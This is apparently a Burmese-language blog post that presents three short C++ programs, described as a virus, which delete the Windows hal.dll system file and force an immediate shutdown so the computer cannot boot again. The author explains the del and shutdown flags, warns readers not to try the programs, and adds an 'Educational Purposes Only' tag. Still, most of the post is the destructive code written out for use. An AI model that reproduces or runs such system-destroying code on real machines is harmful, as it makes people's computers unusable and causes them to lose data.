Yangon (Rangoon) Time
ဒီ virus ကေတာ့ Hal.dll ဖိုင္ကို deletes လုပ္တဲ႔ virus ပါ။ virus စအလုပ္လုပ္ျပီး ဖိုင္ကို deleting လုပ္ျပီးျပီး ဆိုတာနဲ႔ Virus တိုက္ခိုက္ခံရတဲ႔ ကြန္ျပဴတာဟာ Shuts down က်သြားပါလိမ့္ မယ္။ ျပီးရင္ ျပန္ဖြင့္ လို႔မ ရေတာ့ပါဘူး။ စမ္းသပ္ဖို႔မေကာင္းတဲ႔ Virus တမ်ိဳးပါပဲ... ကိုယ့္ဆီမွာလည္း မစမ္းနဲ႔ သူမ်ားကြန္ျပဴတာကိုလည္း သြားမစမ္းတာ ေကာင္းတာပါပဲ။
Orginal Code ကေတာ့ ......
Code:
#include <cstdlib></cstdlib>
#include <iostream></iostream>
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
အထက္မွာ ျပခဲ႔တဲ႔ Virus ကေတာ့ C:\\windows\\ ကိုသာတိုက္ခိုက္ႏိုင္ပါတယ္။ အကယ္၍ တျခား drive တစ္ခုမွာ Windows ကိုတင္ထားမယ္ဆုိရင္ေတာ့ တုိက္ခိုက္ခံရမွာ မဟုတ္ပါဘူး။ အခုျပမယ့္ second version ကေတာ့ ဘယ္ drive မွာပဲ Windows တင္တင္ တိုက္ခိုက္ႏိုင္ပါတယ္။
Code:
#include <cstdlib></cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
</iostream>
ေနာက္တစ္ခုကေတာ့ SVXX's Version ပါ။ ဒီ Virus မွာေတာ့ Batch commands ေတြကို အမ်ားဆံုးသံုးထားပါတယ္။
Code:
#include <cstdlib></cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
system("PAUSE");
return EXIT_SUCCESS;
}
</iostream>
"del" command ကေတာ့ stuff ေတြကို delete လုပ္ဖို႔အတြက္ DOS မွာ သံုးတဲ႔ command ပါ။ "-q" ကေတာ့ force delete (သို႔) အေမးအျမန္းမရွိ ဖ်က္ပါလို႔ အဓိပၸာယ္ရတဲ႔ parameter တစ္ခုပါ။ shutdown -s -f -t 00 ရဲ႕ အဓိပၸာယ္ကေတာ့ အားလံုး running ျပီးတဲ႔အခါမွာ 00 စကၠန္႔အတြင္း Shutdown,force close လုပ္ပါဆိုတဲ႔ အဓိပၸာယ္ပါ။
Educational Purposes Only
No comments:
Post a Comment